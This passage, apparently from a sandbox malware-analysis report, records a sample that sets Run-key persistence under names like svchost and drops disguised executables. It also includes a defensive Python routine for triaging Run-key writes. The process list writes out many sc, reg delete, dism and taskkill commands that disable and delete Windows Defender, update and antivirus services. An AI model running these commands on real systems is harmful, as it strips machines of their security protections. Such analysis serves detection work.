| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost瘀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue000" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
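The six svchost writes above differ only in one trailing character (U+E800, U+8200, none, U+4F40, U+7600, U+E000), which is consistent with the sample writing its wide-string Run value one UTF-16 code unit past the terminator, so the extra unit is whatever happened to follow the string in memory. The entry also borrows a core system binary's name and points into the user's Temp directory, and the HKLM entry is Microsoft.exe registering itself. The triage routine below, added here as an example and not part of the report or the sandbox's own logic, turns those observations into checks over a list of Run-value writes. RUN_KEY_EVENTS repeats the report's values with the trailing characters written as escapes and adds one constructed benign OneDrive entry; the masquerade name list is an assumption.

```python
"""Triage Run-key persistence writes for the anomalies seen in the report.

Added example, not part of the sandbox report.  Events repeat the report's
values (trailing characters as escapes) plus one constructed benign entry;
MASQUERADE_NAMES is an assumption.
"""
import os
import re
import unicodedata
from collections import defaultdict

# Names of core Windows binaries that malware commonly borrows.
MASQUERADE_NAMES = {"svchost", "csrss", "lsass", "explorer", "winlogon", "dwm"}
WINDOWS_DIR_RE = re.compile(r"^[a-z]:\\windows\\", re.IGNORECASE)
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)

USER_RUN = (r"\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000"
            r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
SVCHOST_KEY = USER_RUN + r"\svchost"
ONEDRIVE_KEY = USER_RUN + r"\OneDrive"                       # constructed
MICROSOFT_KEY = r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft"

TEMP_SVCHOST = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost"
OFFICE_EXE = r"C:\Program Files\Microsoft office.exe"

# (key, value, writing process).  The six svchost writes carry the report's
# trailing code units; the OneDrive entry is constructed as a benign control.
RUN_KEY_EVENTS = [
    (SVCHOST_KEY, TEMP_SVCHOST + tail, OFFICE_EXE)
    for tail in ("\ue800", "\u8200", "", "\u4f40", "\u7600", "\ue000")
] + [
    (MICROSOFT_KEY, r"C:\Program Files\Microsoft.exe", r"C:\Program Files\Microsoft.exe"),
    (ONEDRIVE_KEY, r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
     r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe"),
]


def executable_of(value: str) -> str:
    """Executable path from a Run value: the quoted path, else the text up to
    the first .exe, else the whole value."""
    m = re.match(r'"([^"]*)"', value)
    if m:
        return m.group(1)
    m = re.match(r"(.*?\.exe)\b", value, re.IGNORECASE)
    return m.group(1) if m else value


def has_odd_codepoints(text: str) -> bool:
    """Private-use or control characters never belong in a typed path."""
    return any(unicodedata.category(ch) in ("Co", "Cc") for ch in text)


def analyze_run_keys(events):
    """Group writes per value and return {key: {"target", "reasons"}} for
    every entry that trips at least one heuristic."""
    by_key = defaultdict(list)
    for key, value, process in events:
        by_key[key].append((value, process))

    report = {}
    for key, writes in by_key.items():
        distinct = sorted({v for v, _ in writes})
        # Repeated writes that agree except for the last code unit or two are
        # the signature of a wide string stored with a length one unit too
        # long: the extra unit is whatever followed the buffer in memory.
        stable = os.path.commonprefix(distinct)
        reasons = []
        if len(distinct) > 1 and max(len(v) - len(stable) for v in distinct) <= 2:
            reasons.append("value differs between writes only in trailing code units")
        if any(has_odd_codepoints(v) for v in distinct):
            reasons.append("private-use or control character in value")
        exe = executable_of(stable)
        if USER_TEMP_RE.search(exe):
            reasons.append("executable lives in the user's Temp directory")
        stem = exe.rsplit("\\", 1)[-1].lower().removesuffix(".exe")
        if stem in MASQUERADE_NAMES and not WINDOWS_DIR_RE.match(exe):
            reasons.append(f"system binary name '{stem}' outside the Windows directory")
        # Weak on its own (updaters do this too), but worth recording.
        if any(exe.lower() == proc.lower() for _, proc in writes):
            reasons.append("process registered itself for autostart")
        if reasons:
            report[key] = {"target": exe, "reasons": reasons}
    return report


if __name__ == "__main__":
    for key, info in analyze_run_keys(RUN_KEY_EVENTS).items():
        print(key.rsplit("\\", 1)[-1], "->", info["target"])
        for reason in info["reasons"]:
            print("   -", reason)
```

The common-prefix step is what makes the svchost entry usable as an indicator: the six raw values never match a byte-exact IOC, but the stable part, `C:\Users\Admin\AppData\Local\temp\svchost`, does, and it is the path a hunt should look for on disk.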
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_240548093 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\manifest.json | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DF0.tmp\7DF0.tmp\7DF1.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DEF.tmp\7DF0.tmp\7DF1.bat "C:\Program Files\installerX32.exe""
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismhost.exe {3F00BE13-26AE-4701-A6EC-CED460AC4440}
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\system32\sc.exe
sc delete sense
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\system32\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\system32\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete Bytefenceservice
C:\Windows\system32\sc.exe
sc stop Bytefenceservice
C:\Windows\system32\sc.exe
